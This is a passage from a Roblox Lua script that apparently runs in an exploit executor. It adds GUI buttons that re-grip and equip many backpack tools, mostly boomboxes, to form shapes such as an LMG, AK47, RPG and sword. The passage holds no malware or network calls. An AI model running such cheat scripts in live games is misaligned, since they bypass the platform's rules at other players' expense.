8.3, 0) * CFrame.Angles(-1.58, math.rad(195), -1.5) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(8, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(-2.8, 9, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(10.9, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(-3.6, 12, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(13.6, -1.7, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[23].Parent = plr.Character Tools[24].Grip = CFrame.new(13.8, -0.4, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[24].Parent = plr.Character Tools[25].Grip = CFrame.new(12.6, -3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[25].Parent = plr.Character Tools[26].Grip = CFrame.new(14.3, -1.7, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[26].Parent = plr.Character Tools[27].Grip = CFrame.new(14.4, -0.4, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[27].Parent = plr.Character Tools[28].Grip = CFrame.new(14.3, -3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[28].Parent = plr.Character Tools[29].Grip = CFrame.new(8, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[29].Parent = plr.Character Tools[30].Grip = CFrame.new(10.6, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[30].Parent = plr.Character Tools[31].Grip = CFrame.new(-8, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[31].Parent = plr.Character Tools[32].Grip = CFrame.new(-6, -1, 1) * CFrame.Angles(-0.5, math.rad(-90), 0) Tools[32].Parent = plr.Character Tools[33].Grip = CFrame.new(6, -1, 1) * CFrame.Angles(-0.5, math.rad(90), 0) Tools[33].Parent = plr.Character Tools[34].Grip = CFrame.new(-9.6, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[34].Parent = plr.Character Tools[35].Grip = CFrame.new(-12, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[35].Parent = plr.Character Tools[36].Grip = CFrame.new(1.5, 6.5, 0) * CFrame.Angles(-1.6, math.rad(160), -1.5) Tools[36].Parent = plr.Character Tools[37].Grip = CFrame.new(4.4, 4.5, 0) * CFrame.Angles(-1.6, math.rad(180), -1.5) Tools[37].Parent = plr.Character Tools[38].Grip = CFrame.new(2.4, 6.5, 0) * CFrame.Angles(-1.6, math.rad(160), -1.5) Tools[38].Parent = plr.Character Tools[39].Grip = CFrame.new(3.4, -5.6, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[39].Parent = plr.Character Tools[40].Grip = CFrame.new(0.8, -5.6, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[40].Parent = plr.Character Tools[41].Grip = CFrame.new(2.5, -3.5, 0) * CFrame.Angles(-1.65, math.rad(200), -1.6) Tools[41].Parent = plr.Character Tools[42].Grip = CFrame.new(3.6, -3.5, 0) * CFrame.Angles(-1.65, math.rad(200), -1.6) Tools[42].Parent = plr.Character Tools[43].Grip = CFrame.new(-0.3, -5.6, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[43].Parent = plr.Character Tools[44].Grip = CFrame.new(4.4, -6.3, 0) * CFrame.Angles(-1.55, math.rad(180), -1.5) Tools[44].Parent = plr.Character Tools[45].Grip = CFrame.new(5.9, -3.9, 0) * CFrame.Angles(-1.55, math.rad(160), -1.5) Tools[45].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("boombox stack (1-100)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[23].Parent = plr.Character Tools[24].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[24].Parent = plr.Character Tools[25].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[25].Parent = plr.Character Tools[26].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[26].Parent = plr.Character Tools[27].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[27].Parent = plr.Character Tools[28].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[28].Parent = plr.Character Tools[29].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[29].Parent = plr.Character Tools[30].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[30].Parent = plr.Character Tools[31].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[31].Parent = plr.Character Tools[32].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[32].Parent = plr.Character Tools[33].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[33].Parent = plr.Character Tools[34].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[34].Parent = plr.Character Tools[35].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[35].Parent = plr.Character Tools[36].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[36].Parent = plr.Character Tools[37].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[37].Parent = plr.Character Tools[38].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[38].Parent = plr.Character Tools[39].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[39].Parent = plr.Character Tools[40].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[40].Parent = plr.Character Tools[41].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[41].Parent = plr.Character Tools[42].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[42].Parent = plr.Character Tools[43].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[43].Parent = plr.Character Tools[44].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[44].Parent = plr.Character Tools[45].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[45].Parent = plr.Character Tools[46].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[46].Parent = plr.Character Tools[47].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[47].Parent = plr.Character Tools[48].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[48].Parent = plr.Character Tools[49].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[49].Parent = plr.Character Tools[50].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[50].Parent = plr.Character Tools[51].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[51].Parent = plr.Character Tools[52].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[52].Parent = plr.Character Tools[53].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[53].Parent = plr.Character Tools[54].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[54].Parent = plr.Character Tools[55].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[55].Parent = plr.Character Tools[56].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[56].Parent = plr.Character Tools[57].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[57].Parent = plr.Character Tools[58].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[58].Parent = plr.Character Tools[59].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[59].Parent = plr.Character Tools[60].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[60].Parent = plr.Character Tools[61].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[61].Parent = plr.Character Tools[62].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[62].Parent = plr.Character Tools[63].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[63].Parent = plr.Character Tools[64].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[64].Parent = plr.Character Tools[65].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[65].Parent = plr.Character Tools[66].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[66].Parent = plr.Character Tools[67].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[67].Parent = plr.Character Tools[68].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[68].Parent = plr.Character Tools[69].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[69].Parent = plr.Character Tools[70].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[70].Parent = plr.Character Tools[71].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[71].Parent = plr.Character Tools[72].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[72].Parent = plr.Character Tools[73].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[73].Parent = plr.Character Tools[74].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[74].Parent = plr.Character Tools[75].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[75].Parent = plr.Character Tools[76].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[76].Parent = plr.Character Tools[77].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[77].Parent = plr.Character Tools[78].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[78].Parent = plr.Character Tools[79].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[79].Parent = plr.Character Tools[80].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[80].Parent = plr.Character Tools[81].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[81].Parent = plr.Character Tools[82].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[82].Parent = plr.Character Tools[83].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[83].Parent = plr.Character Tools[84].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[84].Parent = plr.Character Tools[85].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[85].Parent = plr.Character Tools[86].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[86].Parent = plr.Character Tools[87].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[87].Parent = plr.Character Tools[88].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[88].Parent = plr.Character Tools[89].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[89].Parent = plr.Character Tools[90].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[90].Parent = plr.Character Tools[91].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[91].Parent = plr.Character Tools[92].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[92].Parent = plr.Character Tools[93].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[93].Parent = plr.Character Tools[94].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[94].Parent = plr.Character Tools[95].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[95].Parent = plr.Character Tools[96].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[96].Parent = plr.Character Tools[97].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[97].Parent = plr.Character Tools[98].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[98].Parent = plr.Character Tools[99].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[99].Parent = plr.Character Tools[100].Grip = CFrame.new(1, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[100].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("LMG (54)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.4, 0, 0) * CFrame.Angles(-1.58, math.rad(160), -1.56) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-1, 2, 0) * CFrame.Angles(-1.58, math.rad(160), -1.56) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-3.6, 2, 0) * CFrame.Angles(-1.58, math.rad(160), -1.56) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-2.6, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-0.6, -1.3, -2) * CFrame.Angles(0, math.rad(180), -0.5) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(0.6, -1.3, -2) * CFrame.Angles(0, math.rad(180), 0.5) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(1.2, -0.2, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-1.2, -0.2, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(1.2, 1, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-1.2, 1, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1.2, 2.3, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(-1.2, 2.3, -2) * CFrame.Angles(0, math.rad(180), 0) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(2.2, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(2.2, 2.4, 0) * CFrame.Angles(-1.58, math.rad(-150), -1.56) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-0.6, -1.3, -2.5) * CFrame.Angles(0, math.rad(180), -0.5) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(0.6, -1.3, -2.5) * CFrame.Angles(0, math.rad(180), 0.5) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(1.2, -0.2, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(-1.2, -0.2, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(1.2, 1, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(-1.2, 1, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(1.2, 2.3, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(-1.2, 2.3, -2.5) * CFrame.Angles(0, math.rad(180), 0) Tools[23].Parent = plr.Character Tools[24].Grip = CFrame.new(4.8, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[24].Parent = plr.Character Tools[25].Grip = CFrame.new(2.2, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[25].Parent = plr.Character Tools[26].Grip = CFrame.new(7.4, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[26].Parent = plr.Character Tools[27].Grip = CFrame.new(10, -2, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[27].Parent = plr.Character Tools[27].Grip = CFrame.new(-1.1, -9.3, 0) * CFrame.Angles(1.58, math.rad(-180), 1.56) Tools[27].Parent = plr.Character Tools[28].Grip = CFrame.new(1.7, -9.3, 0) * CFrame.Angles(1.58, math.rad(-180), 1.56) Tools[28].Parent = plr.Character Tools[29].Grip = CFrame.new(7, -3.9, 0) * CFrame.Angles(1.58, math.rad(-130), 1.56) Tools[29].Parent = plr.Character Tools[30].Grip = CFrame.new(5, -3.9, 0) * CFrame.Angles(1.58, math.rad(-130), 1.56) Tools[30].Parent = plr.Character Tools[31].Grip = CFrame.new(3, -3.9, 0) * CFrame.Angles(1.58, math.rad(-130), 1.56) Tools[31].Parent = plr.Character Tools[32].Grip = CFrame.new(-1.6, -4.5, 0) * CFrame.Angles(1.58, math.rad(-160), 1.56) Tools[32].Parent = plr.Character Tools[33].Grip = CFrame.new(2.2, -3.9, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[33].Parent = plr.Character Tools[34].Grip = CFrame.new(-4.6, -2.9, 0) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[34].Parent = plr.Character Tools[35].Grip = CFrame.new(-3, 3.6, 0) * CFrame.Angles(1.58, math.rad(110), 1.58) Tools[35].Parent = plr.Character Tools[36].Grip = CFrame.new(-0, -3.9, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[36].Parent = plr.Character Tools[37].Grip = CFrame.new(-0, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[37].Parent = plr.Character Tools[38].Grip = CFrame.new(-2.6, -3.9, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[38].Parent = plr.Character Tools[39].Grip = CFrame.new(-2.6, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[39].Parent = plr.Character Tools[40].Grip = CFrame.new(-5.2, -3.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[40].Parent = plr.Character Tools[41].Grip = CFrame.new(-5.2, -2.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[41].Parent = plr.Character Tools[42].Grip = CFrame.new(-5.2, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[42].Parent = plr.Character Tools[43].Grip = CFrame.new(-7.8, -3.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[43].Parent = plr.Character Tools[44].Grip = CFrame.new(-7.8, -2.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[44].Parent = plr.Character Tools[45].Grip = CFrame.new(-7.8, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[45].Parent = plr.Character Tools[46].Grip = CFrame.new(-4.9, 7.6, 0) * CFrame.Angles(1.58, math.rad(-160), 1.56) Tools[46].Parent = plr.Character Tools[47].Grip = CFrame.new(0.6, 9.2, 0) * CFrame.Angles(1.58, math.rad(-200), 1.56) Tools[47].Parent = plr.Character Tools[48].Grip = CFrame.new(-10.4, -2.5, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[48].Parent = plr.Character Tools[49].Grip = CFrame.new(-13, -2.5, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[49].Parent = plr.Character Tools[50].Grip = CFrame.new(-15.6, -2.5, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[50].Parent = plr.Character Tools[51].Grip = CFrame.new(-4.2, 11, 0) * CFrame.Angles(1.58, math.rad(-180), 1.56) Tools[51].Parent = plr.Character Tools[52].Grip = CFrame.new(0.9, 8, 0) * CFrame.Angles(1.58, math.rad(-180), 1.56) Tools[52].Parent = plr.Character Tools[53].Grip = CFrame.new(2.8, 8, -1.2) * CFrame.Angles(1.6, math.rad(-180), 2.3) Tools[53].Parent = plr.Character Tools[54].Grip = CFrame.new(2.8, 8, 1.6) * CFrame.Angles(1.6, math.rad(-180), 0.8) Tools[54].Parent = plr.Character end) --_________________________________________________________________________________________________ local Section = Tab:NewSection("Boombox builds (skidded ones)") Section:NewButton("Ak47 (20)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.7, -0.5, -0.2) * CFrame.Angles(50, math.rad(-180), 3.13) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-1.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0.03) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-2.5, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-4.6, -0.4, -0.2) * CFrame.Angles(1.6, math.rad(-98), 1.6) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-7, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-9.6, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-12.2, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-1.2, -3.1, -0.2) * CFrame.Angles(1.6, math.rad(-15), 1.6) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-3.3, -2.7, -0.2) * CFrame.Angles(1.6, math.rad(-25), 1.6) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-0.1, 1.8, -0.1) * CFrame.Angles(1.6, math.rad(65), 1.6) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1.3, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(3.15, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(5.3, 2.05, -0.1) * CFrame.Angles(1.6, math.rad(90), 1.6) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(6.5, 4.1, -0.1) * CFrame.Angles(1.6, math.rad(110), 1.6) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-14.3, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(3.1, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(5.2, -1.2, -0.2) * CFrame.Angles(0, math.rad(-90), 0) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(0.25, 6.8, -0.05) * CFrame.Angles(1.6, math.rad(-0), 1.6) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(3.8, -4.4, -0.27) * CFrame.Angles(1.6, math.rad(-137), 1.6) Tools[20].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("RPG (13)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.7, -0.5, -0.2) * CFrame.Angles(50, math.rad(-180), 3.13) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.7, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(2.5, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4.3, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.5, -1.6, -0.2) * CFrame.Angles(1.6, math.rad(-250),1.6) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(6, -2.55, -0.2) * CFrame.Angles(1.6, math.rad(-115),1.6) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(1.55, 7.2, 0.1) * CFrame.Angles(1.6, math.rad(-10),1.6) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-1.1, -1.2, -0.23) * CFrame.Angles(1.6, math.rad(-98),1.57) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-2.8, -1.17, -0.17) * CFrame.Angles(1.6, math.rad(-99),1.6) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(0, 2.7, -0.2) * CFrame.Angles(1.575, math.rad(-175),1.575) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-4.6, -1.1, -0.17) * CFrame.Angles(1.6, math.rad(-100),1.6) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(-6.3, -1.1, -0.17) * CFrame.Angles(1.6, math.rad(-100),1.6) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(-1, 6, -0.45) * CFrame.Angles(1.6, math.rad(-205),1.4) Tools[13].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Sword (10)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = 